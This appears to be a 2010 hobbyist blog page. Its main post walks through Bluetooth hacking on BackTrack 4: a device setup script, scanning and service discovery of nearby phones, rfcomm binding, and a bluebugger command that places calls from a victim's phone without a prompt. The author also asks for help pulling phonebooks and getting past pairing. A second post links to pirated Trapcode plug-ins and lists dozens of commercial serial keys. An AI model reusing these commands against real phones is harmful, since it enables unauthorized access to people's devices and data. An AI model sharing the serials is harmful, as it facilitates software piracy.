Tuesday, February 16, 2010

What do you know about Bluetooth hacking on BT4 (Presentation))

Bluetooth hacking on BT4

For your case this is not a tutorial on hacking bluetooth. Am just looking for ideas from other people who have a deeper understanding in bluetooth. You can visit the sites below for basic training;-
http://www.youtube.com/watch?v=PvxccqVC4Oo
http://www.youtube.com/watch?v=6z1d3sXD9RU

You can also join the facebook hacking bluetooth page for more ideas:-
http://www.facebook.com/pages/Hacking-Bluetooth/273923608586?ref=ts

What do i have on my box
First, i wrote a script to configure my Bluetooth device so that i wouldn't have to keep typing every time i need to set it up. This is what it looks like

#!/bin/sh
mkdir -p 666 /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/bluetooth/rfcomm0 c 216 0

# Firing up the bluetooth device#

hciconfig -a hci0 up
hciconfig -a hci0 class 0x500204
hciconfig -a hci0 lm accept, master;
hciconfig -a hci0 lp rswitch,hold,sniff,park;
hciconfig -a hci0 auth enable
hciconfig -a hci0 encrypt enable
hciconfig -a hci0 name ronsoft

Incase you want to change it by the file you can navigate to the bluetooth dir nano /etc/bluetooth/
Here you can have control of even more options by playing around with the conf files.
> rfcomm.conf
> network.conf
> main.conf

Footprinting the remote device
Scan for devices:

hcitool scan hci0
hcitool info xx:xx:xx:xx:xx:xx

You can also ping the device to know it's range
l2ping xx:xx:xx:xx:xx:xx

sdptools browse --l2cap

This will list all service, channels and alot info about the remote device. You may wonder how this could help, but this is the gold mine of bluetooth hacking. Take a pen and paper and note down the important services with their channel numbers, record handles and value attributtes. Famous ports:-
DUN - Dial up network
OBEX - Object exchange
OPUSH - Object push for file trasfer
SAP - Sim access

Update you sdp db

sdptool add --handle= --channel=
sdptool add --handle = 0x10013 --channel = 4 SAP
Now the stress starts from here,. Trying to bind and then connect the rfcomm to the remote device.

rfcomm
rfcomm

rfcomm bind /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm connect /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm show

With the above code, my box turns into an error box. First i get the signals to the remote bluetooth phone but nothing can happen untill i accept the request from the phone. Well, the victim may by chance just hit the accept button without knowing..hahahahaaa....! After establishing connection the remote device needs a 16 digit number in order to complete the pairing!

Now guy, take the turn and tell me. How do you deal with this in your own world?

Tried bluesnarfer and bluebugger but still couldn't get so far. The funny thing is that i can make a call through to the remote device but i can't pull it's phonebook!

bluebugger -m Ron -c 7 -a xx:xx:xx:xx:xx:xx dail 9818303531
The phone goes through successfully even without making prompts accept from the screen light blink

These are some of the errors i get when i try it with bluesnarfer and more bluebugger.

bt_rfcomm_config failed
unable to create rfcomm connect
open /dev/bluetooth/rfcomm/0 connection refused


Can't connect RFCOMM socket:
tcget attr failed: Input / output error
bt_rfcomm_config() failed


rfcomm error connection 216 connection fail
RFCOMMDEV / bluetooth/ not connected.

Guys, if you are good enough with bluetooth please, help out. No one has yet attempted to find a solution to this question "I assume!" Because there are alot of questions but few answers.

Reference:
http://www.palowireless.com/infotooth/tutorial/rfcomm.asp

Downloading and Installing Trapcode Plug-ins (Video))

Wondering were to download trapcode plug-ins 100% for free? How to Insall them so that they can be ready to use in After effects? Then this vid is dedicated to you.

Download Link:
|====== + =======|
http://thepiratebay.org/search/trapco...

1)Trapcode 3D Stroke v2.5 (c) Reg Giant
8903-8797-2500-5519-4444
8340-8710-2500-7987-6881
9218-8738-2500-7902-9759
8981-8721-2500-9688-2522

2)Red Giant Trapcode Form v1.0.2
serial: 9297-8963-1018-3565-2930

3)Red Giant Trapcode Horizon v1.0
serial: 1382-9470-1730-7815-0730

4)Red Giant Trapcode Lux v1.0.2
serial: 1918-9141-1402-9998-4402

5)Red Giant Trapcode Particular v1.5.1
serial: 9002-8862-1284-3553-3389

6)Trapcode Shine v1.5 (c) Red Giant
8815-8527-1500-5923-7332
9211-8575-1500-7243-1728
8659-8595-1500-6742-1176

7)Trapcode Starglow v1.5 (c) Reg Giant
8936-8664-1500-9257-8965
9153-8636-1500-6778-9182
8955-8630-1500-5230-5984
8841-8608-1500-7836-0870

8)Echo space serial
1806-9363-1382-3577-4294

Hacking with the SET toolkit explained (Video)

Network Hijacking with Ettercap script (Video)

Installing spoonwep and spoonwpa

Hacking bluetooth Part Two (Video)

Hacking bluetooth Part 0ne (Video)